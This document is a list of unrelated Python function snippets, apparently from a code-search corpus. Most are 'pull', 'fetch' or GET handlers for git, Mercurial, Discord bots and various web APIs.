"def pull_from_slave():\n print(\"Pulling from slave\")\n r = req.get(f\"{SLAVE_URL}/prepare_pull\")\n if r.status_code != req.codes.ok:\n print(\"Something wrong with slave on prepare pull\")\n print(r.text)\n return False\n print(\"Prepared\")\n try:\n for tname in TABLES:\n with open(f'{tname}.db', 'wb') as f:\n print(f\"Pulling {tname}\")\n r = req.post(f\"{SLAVE_URL}/pull_db/{tname}\", data={'key': HMA_KEY})\n if r.status_code != req.codes.ok:\n print(\"Something went wrong\")\n print(r.text)\n return False\n f.write(r.content)\n return True\n except IOError:\n print(\"IO ERROR\")\n return False",
"def pull(self):\n data = api.get(endpoint=self.endpoint, resource_id=self.slug)\n self.__init__(**data)",
"def pull():\n _with_deploy_env(['git pull'])",
"def pull(self):\n run('git', 'pull', 'origin', 'master')",
"def pull(self, remote, branch, *args):\n return self.cmd('pull', remote, branch, *args)",
"def pull(self, *args, **kwargs) -> Any:\n raise NotImplementedError",
"async def async_update(self):\n try:\n self._data = requests.get(self._build_url(), timeout=10, headers={'accept-encoding': None}).json()\n _LOGGER.debug(\"TOON fetched data = %s\", self._data)\n except (requests.exceptions.RequestException) as error:\n _LOGGER.error(\"Unable to connect to TOON: %s\", error)\n self._data = None",
"def pull(self, verbose=True):\n fetch_cmd = [\"git\", \"fetch\"]\n if not verbose:\n fetch_cmd.append(\"-q\")\n subprocess.call(fetch_cmd, cwd=self.path)\n checkout_cmd = [\"git\", \"checkout\", \"origin/master\", \"-B\", \"master\"]\n if not verbose:\n checkout_cmd.append(\"-q\")\n return subprocess.call(checkout_cmd, cwd=self.path)",
"def remote_pull(*keys):",
"def test_pull_from_origin(tmpdir):\n gitwrapper.clone_from('git://github.com/Tinche/bower-cache', tmpdir)\n gitwrapper.pull_from_origin(tmpdir)",
"def bzpull(request, target):\n if target.startswith(\"sha1:\"):\n target = target[5:]\n url = \"http://bitzi.com/lookup/%s?v=tventtxt\" % target\n tventtxt = urllib.urlopen(url)\n tventdict = {}\n targets_to_update = set()\n count = 0\n text = \"\"\n try:\n for line in tventtxt:\n text += '\\n'\n line = line.strip()\n text += line\n if not line:\n if 'user' in tventdict and 'target_id' in tventdict and 'when' in tventdict:\n tvent = Tvent()\n tvent.when = tventdict['when']\n tvent.user = tventdict['user']\n target, created = Target.objects.get_or_create(id=tventdict['target_id'])\n tvent.target = target\n targets_to_update.add(target.id)\n tvent.tagtext = tventdict['tagtext']\n tvent.save()\n count += 1\n else:\n # error; required field not present\n text += '\\nERROR: incomplete tvent ' + str(tventdict)\n tventdict = {}\n continue\n if line.startswith(\"=\"):\n tventdict['when'] = line[1:]\n continue\n if line.startswith(\"~\"):\n tventdict['user'] = line[1:]\n continue\n if line.startswith(\"@\"):\n tventdict['target_id'] = line[1:]\n continue\n tventdict['tagtext'] = tventdict.get('tagtext','') + line + '\\n'\n if 'user' in tventdict and 'target_id' in tventdict and 'when' in tventdict:\n # TODO: reduce duplication with above\n tvent = Tvent()\n tvent.when = tventdict['when']\n tvent.user = tventdict['user']\n target = Target.objects.get_or_create(id=tventdict['target_id'])\n tvent.target = target\n targets_to_update.add(target.id)\n # TODO: cleanup tags here? \n tvent.save()\n count += 1\n else:\n # error; required field not present\n text += '\\nERROR: incomplete tvent ' + str(tventdict)\n finally:\n tventtxt.close()\n # trigger update of any possibly-changed Target summaries\n for id in targets_to_update:\n Target.objects.get(id=id).updateFromTvents()\n return HttpResponse('Pulled %d tvents from: %s\\n %s' % (count, url, text), mimetype='text/plain')",
"def pull(self):\n raise NotImplementedError()",
"def pull(args):\n cache = set(args.remote_cache).union(set(args.cache))\n for path in sorted(cache):\n if not os.path.exists(os.path.join(args.base, path)) and remote_exists(args.sftp, os.path.join(args.remote_base, path)):\n print('pull: {}'.format(path))\n ensure_local(os.path.dirname(os.path.join(args.base, path)))\n args.sftp.get(\n os.path.join(args.remote_base, path),\n os.path.join(args.base, path)\n )\n args.cache.append(path)\n args.update = True\n return",
"def pull():\n am = AccountManager(get_settings())\n am.pull_all()",
"def d_ploy():\n\tlocal(\"git push origin --all\")\n\twith cd(LIVE_ROOT):\n\t\trun(\"git pull\")",
"def local_bonds_prices():\n url1 = \"https://api.invertironline.com/token\"\n\n data = {\n \"username\": usuario,\n \"password\": password,\n \"grant_type\": \"password\" \n }\n response = requests.post(url1, data=data)\n if response.status_code == 200:\n content = response.text\n access_key = token_key(content)\n\n url2 = f'https://api.invertironline.com/api/v2/Cotizaciones/Bonos/Merval/argentina'\n datos = requests.get(url2, headers={\n 'Authorization': 'Bearer '+access_key\n })\n datos = json.loads(datos.text)\n datos = datos['titulos']\n datos = clean_assets(datos)\n return datos",
"def pull1(repo, **kwargs):\n ret = do_pull(repo, \"topology.virl\")\n if not ret:\n exit(1)",
"def _fetch_remote(self, dqueue, server, url, timeout):\n try:\n req = requests.get(url, timeout=timeout)\n if req.status_code == 200:\n try:\n resp_params = parse_sync_response(req.text)\n dqueue.put({'server': server, 'params': resp_params})\n except ValueError as err:\n logger.error('Failed to parse response of %s: %s', server, err)\n else:\n logger.warning('Recieved status code %s for %s', req.status_code, url)\n except Exception as err:\n logger.warning('Failed to retrieve %s: %s', url, err)",
"def download_stewicombo_from_remote(name):\n meta = set_stewicombo_meta(name, category='')\n log.info(f'attempting download of {name} from {paths.remote_path}')\n download_from_remote(meta, paths)",
"async def fetch_get(self, command, data):\n _LOGGER.debug(\"[Foobar2k] Running fetch GET\")\n async with self._session.get(\"{base_url}{command}\".format(\n base_url=self._base_url, command=command), data=data) as resp_obj:\n response = await resp_obj.text()\n if (resp_obj.status == 200 or resp_obj.status == 204):\n _LOGGER.debug(\"[Foobar2k] Have a response\")\n return response\n else:\n _LOGGER.error(f\"Host [{self._host}] returned HTTP status code [{resp_obj.status}] to GET command at \"\n \"end point [{command}]\")\n return None",
"def _pull_now(self) -> None:\n raise NotImplementedError()",
"def fetch(self, remote, *args):\n return self.cmd('fetch', remote, *args)",
"def _pullbundle2(pullop):\n kwargs = {b'bundlecaps': caps20to10(pullop.repo, role=b'client')}\n\n # make ui easier to access\n ui = pullop.repo.ui\n\n # At the moment we don't do stream clones over bundle2. If that is\n # implemented then here's where the check for that will go.\n streaming = streamclone.canperformstreamclone(pullop, bundle2=True)[0]\n\n # declare pull perimeters\n kwargs[b'common'] = pullop.common\n kwargs[b'heads'] = pullop.heads or pullop.rheads\n\n # check server supports narrow and then adding includepats and excludepats\n servernarrow = pullop.remote.capable(wireprototypes.NARROWCAP)\n if servernarrow and pullop.includepats:\n kwargs[b'includepats'] = pullop.includepats\n if servernarrow and pullop.excludepats:\n kwargs[b'excludepats'] = pullop.excludepats\n\n if streaming:\n kwargs[b'cg'] = False\n kwargs[b'stream'] = True\n pullop.stepsdone.add(b'changegroup')\n pullop.stepsdone.add(b'phases')\n\n else:\n # pulling changegroup\n pullop.stepsdone.add(b'changegroup')\n\n kwargs[b'cg'] = pullop.fetch\n\n legacyphase = b'phases' in ui.configlist(b'devel', b'legacy.exchange')\n hasbinaryphase = b'heads' in pullop.remotebundle2caps.get(b'phases', ())\n if not legacyphase and hasbinaryphase:\n kwargs[b'phases'] = True\n pullop.stepsdone.add(b'phases')\n\n if b'listkeys' in pullop.remotebundle2caps:\n if b'phases' not in pullop.stepsdone:\n kwargs[b'listkeys'] = [b'phases']\n\n bookmarksrequested = False\n legacybookmark = b'bookmarks' in ui.configlist(b'devel', b'legacy.exchange')\n hasbinarybook = b'bookmarks' in pullop.remotebundle2caps\n\n if pullop.remotebookmarks is not None:\n pullop.stepsdone.add(b'request-bookmarks')\n\n if (\n b'request-bookmarks' not in pullop.stepsdone\n and pullop.remotebookmarks is None\n and not legacybookmark\n and hasbinarybook\n ):\n kwargs[b'bookmarks'] = True\n bookmarksrequested = True\n\n if b'listkeys' in pullop.remotebundle2caps:\n if b'request-bookmarks' not in pullop.stepsdone:\n # make sure to always includes bookmark data when migrating\n # `hg incoming --bundle` to using this function.\n pullop.stepsdone.add(b'request-bookmarks')\n kwargs.setdefault(b'listkeys', []).append(b'bookmarks')\n\n # If this is a full pull / clone and the server supports the clone bundles\n # feature, tell the server whether we attempted a clone bundle. The\n # presence of this flag indicates the client supports clone bundles. This\n # will enable the server to treat clients that support clone bundles\n # differently from those that don't.\n if (\n pullop.remote.capable(b'clonebundles')\n and pullop.heads is None\n and list(pullop.common) == [pullop.repo.nullid]\n ):\n kwargs[b'cbattempted'] = pullop.clonebundleattempted\n\n if streaming:\n pullop.repo.ui.status(_(b'streaming all changes\\n'))\n elif not pullop.fetch:\n pullop.repo.ui.status(_(b\"no changes found\\n\"))\n pullop.cgresult = 0\n else:\n if pullop.heads is None and list(pullop.common) == [pullop.repo.nullid]:\n pullop.repo.ui.status(_(b\"requesting all changes\\n\"))\n if obsolete.isenabled(pullop.repo, obsolete.exchangeopt):\n remoteversions = bundle2.obsmarkersversion(pullop.remotebundle2caps)\n if obsolete.commonversion(remoteversions) is not None:\n kwargs[b'obsmarkers'] = True\n pullop.stepsdone.add(b'obsmarkers')\n _pullbundle2extraprepare(pullop, kwargs)\n\n remote_sidedata = bundle2.read_remote_wanted_sidedata(pullop.remote)\n if remote_sidedata:\n kwargs[b'remote_sidedata'] = remote_sidedata\n\n with pullop.remote.commandexecutor() as e:\n args = dict(kwargs)\n args[b'source'] = b'pull'\n bundle = e.callcommand(b'getbundle', args).result()\n\n try:\n op = bundle2.bundleoperation(\n pullop.repo, pullop.gettransaction, source=b'pull'\n )\n op.modes[b'bookmarks'] = b'records'\n bundle2.processbundle(pullop.repo, bundle, op=op)\n except bundle2.AbortFromPart as exc:\n pullop.repo.ui.error(_(b'remote: abort: %s\\n') % exc)\n raise error.RemoteError(_(b'pull failed on remote'), hint=exc.hint)\n except error.BundleValueError as exc:\n raise error.RemoteError(_(b'missing support for %s') % exc)\n\n if pullop.fetch:\n pullop.cgresult = bundle2.combinechangegroupresults(op)\n\n # processing phases change\n for namespace, value in op.records[b'listkeys']:\n if namespace == b'phases':\n _pullapplyphases(pullop, value)\n\n # processing bookmark update\n if bookmarksrequested:\n books = {}\n for record in op.records[b'bookmarks']:\n books[record[b'bookmark']] = record[b\"node\"]\n pullop.remotebookmarks = books\n else:\n for namespace, value in op.records[b'listkeys']:\n if namespace == b'bookmarks':\n pullop.remotebookmarks = bookmod.unhexlifybookmarks(value)\n\n # bookmark data were either already there or pulled in the bundle\n if pullop.remotebookmarks is not None:\n _pullbookmarks(pullop)",
"async def pull(self) -> None:\n pull_fun = getattr(self, '_pull')\n if inspect.iscoroutinefunction(pull_fun):\n await pull_fun()\n return\n await run_sync(pull_fun)",
"def do_pull_file(dbsync, bibkey):\n pass",
"def pull(repo, **kwargs):\n ret = do_pull(repo, \"topology.yaml\")\n if not ret:\n ret = do_pull(repo, \"topology.virl\")\n if not ret:\n exit(1)",
"def pull(self, **kwargs):\n return _taskpipeoperation(self,'pull', **kwargs)",
"def retrieve_update(self, apikey):\n\n # Get the full url to use\n url = SB_URL_TEMPLATE % (apikey, self.get_version_string())\n self.log.debug(\"Grabbing from url: %s\" % url)\n\n # Grab the blacklist\n try:\n if self.proxy:\n self.log.debug(\"Updating with proxy: %s\" % self.proxy)\n proxy_support = urllib2.ProxyHandler({\"http\" : self.proxy})\n opener = urllib2.build_opener(proxy_support)\n urllib2.install_opener(opener)\n return urllib2.urlopen(url,timeout=TIMEOUT)\n #return self._local_fopen(url) # for testing only\n except urllib2.URLError, e:\n if hasattr(e, \"reason\"):\n self.log.error(e.reason)\n raise SafeBrowsingUpdateError(e.reason)\n elif hasattr(e, \"code\"):\n self.log.error(str(e))\n raise SafeBrowsingUpdateError(str(e))",
"def update():\n call('git -C ~/norminette+ pull', shell=True)",
"def test_pull2(self):\n\n # Use defaults for format, arch, os, ostcount, replication\n pr = self.pull\n # Do the pull\n session = self.mtm.new_session(self.auth, self.system)\n rec1 = self.mtm.pull(session, pr) # ,delay=False)\n pr['tag'] = self.tag2\n rec2 = self.mtm.pull(session, pr) # ,delay=False)\n self.assertIsNotNone(rec1)\n id1 = rec1['_id']\n self.assertIsNotNone(rec2)\n id2 = rec2['_id']\n # Confirm record\n q = {'system': self.system, 'itype': self.itype, 'pulltag': self.tag}\n mrec = self.images.find_one(q)\n self.assertIn('_id', mrec)\n state = self.time_wait(id1)\n self.assertEqual(state, 'READY')\n state = self.time_wait(id2)\n self.assertEqual(state, 'READY')\n mrec = self.images.find_one(q)\n self.images.drop()",
"async def pull(ctx):\n author = ctx.author\n if author.id in authorities:\n out = subprocess.Popen(['git', 'pull'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n stdout,stderr = out.communicate()\n stdout = stdout.decode(\"utf-8\")\n msg = '**Output: **{0}\\n'.format(stdout)\n if stderr:\n stderr = stderr.decode(\"utf-8\")\n msg += '**Error: **\\n{0}'.format(stderr)\n await ctx.send(msg)\n else:\n await ctx.send(\"You can't tell me what to do!\")",
"def get(self):\n url = \"http://twitter.com/statuses/public_timeline.json\"\n task = taskqueue.Task(\n url='/tasks/fetch',\n params={'url': url}\n )\n task.add('fetch')",
"def force_pull(self):\n return self._force_pull",
"def pull(self, data):\n required = {'token', 'source'}\n api.validate(data, required)\n token = data['token']\n repo = data['source']\n self.credentials_module.authorize(token)\n result = self.docker_module.pull_image(repo)\n # credentials_module.add_image(token, result['image_id'])\n return result",
"def assets_pull(ctx, text, method):\n ocean = ctx.obj['ocean']\n response = []\n for did in ocean.search(text):\n print('pulling:', did)\n response += [ctx.invoke(assets_consume,\n did=did,\n method=method)]",
"def fetch(self, remote: str, branch: str) -> str:\n self.__verify_repo_initialized()\n address = heads.get_remote_address(self._env.branchenv, name=remote)\n self._client = HangarClient(envs=self._env, address=address)\n CW = ContentWriter(self._env)\n\n with closing(self._client) as client:\n client: HangarClient\n\n # ----------------- setup / validate operations -------------------\n\n try:\n cHEAD = heads.get_branch_head_commit(self._env.branchenv, branch)\n except ValueError:\n # branch does not exist on local client\n try:\n s_branch = client.fetch_branch_record(branch)\n sHEAD = s_branch.rec.commit\n except grpc.RpcError as rpc_error:\n if rpc_error.code() == grpc.StatusCode.NOT_FOUND:\n # branch does not exist on remote\n logger.error(rpc_error.details())\n raise rpc_error\n else:\n c_bhistory = summarize.list_history(\n self._env.refenv, self._env.branchenv, branch_name=branch)\n try:\n s_branch = client.fetch_branch_record(branch)\n sHEAD = s_branch.rec.commit\n except grpc.RpcError as rpc_error:\n if rpc_error.code() == grpc.StatusCode.NOT_FOUND:\n # branch does not exist on remote\n logger.error(rpc_error.details())\n raise rpc_error\n\n # verify histories are intact and should be synced\n if sHEAD == cHEAD:\n warnings.warn(f'NoOp: {sHEAD} == client HEAD {cHEAD}', UserWarning)\n return branch\n elif sHEAD in c_bhistory['order']:\n warnings.warn(\n f'REJECTED: remote HEAD: {sHEAD} behind local: {cHEAD}', UserWarning)\n return branch\n\n # ------------------- get data ------------------------------------\n\n mCmtResponse = client.fetch_find_missing_commits(branch)\n m_cmts = mCmtResponse.commits\n for commit in tqdm(m_cmts, desc='fetching commit data refs'):\n # Get missing label (metadata) digest & values\n m_labels = set(client.fetch_find_missing_labels(commit))\n for label in m_labels:\n received_hash, labelVal = client.fetch_label(label)\n CW.label(received_hash, labelVal)\n # Get missing data schema digests & values\n mSchemaResponse = client.fetch_find_missing_schemas(commit)\n for schema in mSchemaResponse.schema_digests:\n schema_hash, schemaVal = client.fetch_schema(schema)\n CW.schema(schema_hash, schemaVal)\n # Record missing data hash digests (does not get data itself)\n m_hashes = client.fetch_find_missing_hash_records(commit)\n m_schema_hash_map = defaultdict(list)\n for digest, schema_hash in m_hashes:\n m_schema_hash_map[schema_hash].append((digest, schema_hash))\n for schema_hash, received_data in m_schema_hash_map.items():\n CW.data(schema_hash, received_data, backend='50')\n\n # Get missing commit reference specification\n for commit in tqdm(m_cmts, desc='fetching commit spec'):\n cmt, parentVal, specVal, refVal = client.fetch_commit_record(commit)\n CW.commit(cmt, parentVal, specVal, refVal)\n\n # --------------------------- At completion -----------------------\n\n # Update (or create) remote branch pointer with new HEAD commit\n fetchBranchName = f'{remote}/{branch}'\n try:\n heads.create_branch(\n self._env.branchenv, name=fetchBranchName, base_commit=sHEAD)\n except ValueError:\n heads.set_branch_head_commit(\n self._env.branchenv, branch_name=fetchBranchName, commit_hash=sHEAD)\n\n return fetchBranchName",
"def pull(connection, rid=None, repo=None):\n\n if repo is None:\n repo = Repository(connection, rid)\n\n return repo.pull()",
"def pull_data(stop_event):\r\n logger = logging.getLogger(__name__)\r\n\r\n # List of current formats supported\r\n currency_list = ['https://www.bitstamp.net/api/v2/ticker_hour/btceur', 'https://www.bitstamp.net/api/v2/ticker_hour/btcusd',\r\n 'https://www.bitstamp.net/api/v2/ticker_hour/ethusd', 'https://www.bitstamp.net/api/v2/ticker_hour/etheur']\r\n\r\n # Loop until told otherwise!\r\n while not stop_event.is_set():\r\n for currency in currency_list:\r\n res = requests.get(currency)\r\n try:\r\n res.raise_for_status()\r\n except requests.exceptions.HTTPError as e:\r\n # Not 200\r\n logger.error(str(e))\r\n continue\r\n\r\n # Get the end characters to dertermine the type e.g. btceur, ethusd, etc...\r\n currency_type = (currency.rpartition('/')[-1])\r\n logger.info('The Curreny type: ' + currency_type)\r\n\r\n if currency_type == 'btceur':\r\n table = 'btceur'\r\n elif currency_type == 'btcusd':\r\n table = 'btcusd'\r\n elif currency_type == 'ethusd':\r\n table = 'ethusd'\r\n elif currency_type == 'etheur':\r\n table = 'etheur'\r\n else:\r\n table = None\r\n\r\n # Extract Data and Fields\r\n data = res.json()\r\n field_list = data.keys()\r\n logger.info(field_list)\r\n value_list = data.values()\r\n logger.info(value_list)\r\n\r\n # Write to DB\r\n db_commit(table, field_list, value_list)\r\n # Cannot make more than 600 requests per 10 minutes or they will ban your IP address.\r\n # Will in time get real time using their websocket API.\r\n time.sleep(5)",
"def pull(\n self,\n source: Optional[Path] = None,\n destination: Optional[Path] = None,\n options: Optional[List[str]] = None,\n extend_options: Optional[List[str]] = None) -> None:\n if not self.is_ready:\n return",
"def fetch(self) -> None:\n pass",
"def fetch(args):\n do_all_projects_remotes(args + [\"fetch\"])",
"def Pull(self):\n self.response = [stdin.readline()[:-1] for i in range(self.market_number)]\n if len(self.response[0]) == 0:\n self.response = None\n return\n for i in range(self.market_number):\n self.price[self.response[i].split(\":\")[0]].insert(0, float(self.response[i].split(\":\")[1]))\n if len(self.price[self.response[i].split(\":\")[0]]) > self.period:\n self.price[self.response[i].split(\":\")[0]].pop()\n if self.response[i].split(\":\")[0] == self.little_name:\n self.little.insert(0, float(self.response[i].split(\":\")[1]))\n if len(self.little) > self.period:\n self.little.pop()",
"def fetch(self):\n pass",
"def fetch(self):\n pass",
"def main():\n get_obofoundry(force_download=True)",
"def get_latest_data():\n try:\n print '\\nRequesting new data.....\\n'\n response = get(\"https://api.myjson.com/bins/2csub\")\n if response.status_code is 200:\n print '\\nSuccess (200) in downloading data\\n'\n current_json = response.json()\n set_backup_data(current_json)\n else: \n current_json = get_backup_data()\n except ConnectionError:\n current_json = get_backup_data()\n return current_json",
"def do_pull(self, arg):\n checkLocalGitLocation()\n teamorindividual = input(\"Is this a team or individual (t or i):\")\n if teamorindividual == 'i':\n for student in returnAllStudents():\n os.system(\"cd %s && git pull https://github.ccs.neu.edu/%s && cd ..\" %\n (localgitlocation, 'cs5500/' + student))\n else:\n for team in returnAllTeams():\n os.system(\"cd %s && git pull https://github.ccs.neu.edu/%s/%s && cd ..\" %\n (localgitlocation + '/' + team, githuborg, team))",
"def fetch_the_data():\n subprocess.run([\"wget\", \"https://storage.googleapis.com/recipe-box/recipes_raw.zip\"])\n subprocess.run([\"unzip\", \"recipes_raw.zip\", \"-d\", RECIPES_DIRPATH])\n subprocess.run([\"rm\", \"recipes_raw.zip\"])",
"def pull2(repo, overwrite=True):\n cmd = 'git pull --no-edit'\n out = repo.issue(cmd, error='return')\n if overwrite and out is not None:\n repo._handle_overwrite_error(out)\n # Retry\n repo.issue(cmd)",
"def pull(targets, *keys):",
"def download():\n toydata = requests.get(DATA_URL).json()\n return toydata",
"def do_GET(self):\n print(\"do_GET: got: \" + str(self.path))\n path_split = self.path.split(\"/\", 2) # ['', 'hello', 'nikolay/uuuuer']\n username = path_split[-1] # nikolay/uuuuer\n print(\"do_GET: Let's open db_conn\")\n connection = db_open()\n birth_date = db_select(username, connection)\n db_close(connection)\n\n days_until_bday = get_days_to_bday(birth_date)\n json_obj = http_construct_json(username, days_until_bday)\n\n self.http_send_reply(json_obj)\n print(\"do_GET: DONE! \\n\")",
"def git_pull(where=None):\n config = get_config(where)\n with settings(host_string=config['host_string']), cd(config['installation_dir']):\n run('git pull')\n run('git submodule update')\n collectstatic(where)\n restart(where)",
"def do_GET(self):\n f = self.send_head()\n if f:\n try:\n \n self.copyfile(f, self.wfile)\n finally:\n f.close()",
"def get_pulls(self):\n url = self.base_url + 'pulls'\n\n req = requests.get(headers=self.headers, url=url)\n\n return req.json()",
"def handle_get(self, api, command):\n return self._make_request_from_command('GET', command)",
"async def source(self, context):\n await context.channel.send(\"https://github.com/balfroim/TengriBOT\")",
"def do_fetch(self):\n pass",
"def call_git_pull():\n print(\"This will pull the remote repo and overwrite the local notes\")\n call([\"git\", \"pull\"])",
"def do_GET(self):\r\n f = self.send_head()\r\n if f:\r\n self.copyfile(f, self.wfile)\r\n f.close()",
"def pull(self) -> List[DemoBinaryPassenger]:\n output = []\n passenger1 = DemoBinaryPassenger()\n passenger1.external_id = \"ID_BIN_1\"\n passenger1.source_system = \"DEMO_SYSTEM\"\n passenger1.puller_module = self.__module__\n passenger1.attachments.append(Attachment(\n p_name=DemoBinaryPuller._BIN_FILE_NAME,\n p_format=AttachmentFormat.binary,\n p_binary_content=DemoBinaryPuller._get_sample_binary()))\n output.append(passenger1)\n self.log.append_text(\"Got passenger \" + passenger1.id_text)\n return output",
"def fetchall(self):\n try:\n self.repo.remotes.origin.fetch()\n except git.exc.GitCommandError as err:\n raise GitError(err)",
"def __gitFetch(self):\n self.vcs.gitFetch(self.project.getProjectPath())",
"def _pullchangeset(pullop):\n # We delay the open of the transaction as late as possible so we\n # don't open transaction for nothing or you break future useful\n # rollback call\n if b'changegroup' in pullop.stepsdone:\n return\n pullop.stepsdone.add(b'changegroup')\n if not pullop.fetch:\n pullop.repo.ui.status(_(b\"no changes found\\n\"))\n pullop.cgresult = 0\n return\n tr = pullop.gettransaction()\n if pullop.heads is None and list(pullop.common) == [pullop.repo.nullid]:\n pullop.repo.ui.status(_(b\"requesting all changes\\n\"))\n elif pullop.heads is None and pullop.remote.capable(b'changegroupsubset'):\n # issue1320, avoid a race if remote changed after discovery\n pullop.heads = pullop.rheads\n\n if pullop.remote.capable(b'getbundle'):\n # TODO: get bundlecaps from remote\n cg = pullop.remote.getbundle(\n b'pull', common=pullop.common, heads=pullop.heads or pullop.rheads\n )\n elif pullop.heads is None:\n with pullop.remote.commandexecutor() as e:\n cg = e.callcommand(\n b'changegroup',\n {\n b'nodes': pullop.fetch,\n b'source': b'pull',\n },\n ).result()\n\n elif not pullop.remote.capable(b'changegroupsubset'):\n raise error.Abort(\n _(\n b\"partial pull cannot be done because \"\n b\"other repository doesn't support \"\n b\"changegroupsubset.\"\n )\n )\n else:\n with pullop.remote.commandexecutor() as e:\n cg = e.callcommand(\n b'changegroupsubset',\n {\n b'bases': pullop.fetch,\n b'heads': pullop.heads,\n b'source': b'pull',\n },\n ).result()\n\n bundleop = bundle2.applybundle(\n pullop.repo, cg, tr, b'pull', pullop.remote.url()\n )\n pullop.cgresult = bundle2.combinechangegroupresults(bundleop)",
"def _pullbookmarks(pullop):\n if b'bookmarks' in pullop.stepsdone:\n return\n pullop.stepsdone.add(b'bookmarks')\n repo = pullop.repo\n remotebookmarks = pullop.remotebookmarks\n bookmod.updatefromremote(\n repo.ui,\n repo,\n remotebookmarks,\n pullop.remote.url(),\n pullop.gettransaction,\n explicit=pullop.explicitbookmarks,\n )",
"def container_pull(ctx, token, source):\n try:\n out = ctx.obj.container_pull(token, source)\n print_message(out)\n except BaseException as e:\n print_error(e.message)",
"def pull(args):\n do_all_projects(args + [\"pull\"])",
"def do_GET(self):\n f = self.send_head()\n if f:\n try:\n self.copyfile(f, self.wfile)\n finally:\n f.close()",
"def __sync_bulbs__() -> list:\n\n bulbs = list()\n\n try:\n discovered_bulbs = discover_bulbs(timeout=2)\n except Exception as e:\n raise Exception(str(e))\n\n for bulb in discovered_bulbs:\n ip = bulb['ip']\n port = bulb['port']\n model = bulb['capabilities']['model']\n name = bulb['capabilities']['name']\n name = name if name != '' else ip\n identifier = bulb['capabilities']['id']\n\n found_bulb = Bulb(\n ip=ip,\n port=port,\n model=model\n )\n\n found_bulb.set_name(name)\n properties = found_bulb.get_properties()\n\n bulbs.append({\n 'bulb': found_bulb,\n 'name': name,\n 'model': model,\n 'ip': ip,\n 'metadata':\n {\n 'id': identifier,\n 'ip': ip,\n 'name': name,\n 'model': model,\n 'properties': properties\n }\n })\n\n return bulbs",
"def pull(self, pull: Optional[int] = None) -> Optional[int]:\n ...",
"def query_bot(self):\n tmp = os.path.join(self._tmpdir, 'bots.json')\n args = [\n '-json',\n tmp,\n ]\n ret = self._run_swarming('bots', args)\n assert ret == 0, 'Failed to fetch bots. exit_code=%d' % ret\n with open(tmp, 'rb') as f:\n bots = json.load(f)\n if not bots:\n return\n return bots[0]",
"def get(self, id):\n return self.__get_object(super(PullRequests, self).get(id))",
"def checkout_latest():\n with cd(env.repo_path):\n run('git checkout %(branch)s;' % env)\n run('git pull origin %(branch)s' % env)",
"def pull(ctx, path_base):\n with ctx.cd(path_base):\n ctx.run('git reset --hard')\n ctx.run('git pull origin master')",
"def fpull(var, wrapper, message):\n _git_pull(wrapper)",
"async def _brawlcord(self, ctx: Context):\n\n from .brawlcord import __version__\n\n info = (\n \"Brawlcord is a Discord bot which allows users to simulate\"\n f\" a simple version of [Brawl Stars]({BRAWLSTARS}), a mobile\"\n f\" game developed by Supercell. \\n\\nBrawlcord has features\"\n \" such as interactive 1v1 Brawls, diverse Brawlers and\"\n \" leaderboards! You can suggest more features in [the community\"\n f\" server]({COMMUNITY_SERVER})!\\n\\n{ctx.me.name} is currently in\"\n f\" **{len(self.bot.guilds)}** servers!\"\n )\n\n disclaimer = (\n \"This content is not affiliated with, endorsed, sponsored,\"\n \" or specifically approved by Supercell and Supercell is\"\n \" not responsible for it. For more information see Supercell’s\"\n f\" [Fan Content Policy]({FAN_CONTENT_POLICY}).\"\n )\n\n embed = discord.Embed(color=EMBED_COLOR)\n\n embed.add_field(name=\"About Brawlcord\", value=info, inline=False)\n\n embed.add_field(name=\"Creator\", value=f\"[Snowsee]({REDDIT_LINK})\")\n\n page = urllib.request.urlopen(BRAWLCORD_CODE_URL)\n\n text = page.read()\n\n version_str = f\"[{__version__}]({SOURCE_LINK})\"\n\n match = re.search(\"__version__ = \\\"(.+)\\\"\", text.decode(\"utf-8\"))\n\n if match:\n current_ver = match.group(1)\n if LooseVersion(current_ver) > LooseVersion(__version__):\n version_str += f\" ({current_ver} is available!)\"\n\n embed.add_field(name=\"Version\", value=version_str)\n\n embed.add_field(name=\"Invite Link\",\n value=f\"[Click here]({INVITE_URL})\")\n\n embed.add_field(\n name=\"Feedback\",\n value=(\n f\"You can give feedback to improve Brawlcord in\"\n f\" [the community server]({COMMUNITY_SERVER}).\"\n ),\n inline=False\n )\n\n embed.add_field(name=\"Disclaimer\", value=disclaimer, inline=False)\n\n try:\n await ctx.send(embed=embed)\n except discord.Forbidden:\n return await ctx.send(\n \"I do not have the permission to embed a link.\"\n \" Please give/ask someone to give me that permission.\"\n )",
"async def pull(ctx, pip=None):\n dev = ctx.message.author\n if bot.botdev_role in dev.roles or bot.owner_role in dev.roles:\n await ctx.send(\"`Pulling changes...`\")\n call([\"git\", \"stash\", \"save\"])\n call([\"git\", \"pull\"])\n call([\"git\", \"stash\", \"clear\"])\n pip_text = \"\"\n if pip == \"-p\" or pip == \"--pip\" or pip == \"-Syu\":\n await ctx.send(\"`Updating python dependencies...`\")\n call([\"python3.6\", \"-m\", \"pip\", \"install\", \"--user\", \"--upgrade\", \"-r\",\n \"requirements.txt\"])\n pip_text = \" and updated python dependencies\"\n await ctx.send(\"Pulled changes{}! Restarting...\".format(pip_text))\n call([\"python3.6\", \"SchmuckBot.py\"])\n else:\n if \"pacman\" in ctx.message.content:\n await ctx.send(\"`{} is not in the sudoers file. This incident will be reported.`\".format(ctx.message.author.display_name))\n else:\n await ctx.send(\"Only bot devs and / or owners can use this command\")",
"def syncpull(repo, remote, gettransaction):\n tr = None\n if _enabled:\n repo.ui.debug('fetching remote obsolete markers\\n')\n remoteobs = remote.listkeys('obsolete')\n if 'dump0' in remoteobs:\n tr = gettransaction()\n for key in sorted(remoteobs, reverse=True):\n if key.startswith('dump'):\n data = base85.b85decode(remoteobs[key])\n repo.obsstore.mergemarkers(tr, data)\n repo.invalidatevolatilesets()\n return tr",
"def do_GET(self):\n server_ip = Setup.parse_options()['ip_address']\n uri = \"http://\" + server_ip + self.path\n response = urllib.urlopen(uri)\n self.copyfile(response, self.wfile)\n headers = self.generate_header_dic(self.headers.headers)\n ip_address = self.client_address[0] # get client iP address\n if Setup.system_status != 'green':\n self.process_request(ip_address, headers, self.path)\n self.process_response(ip_address, response.headers)",
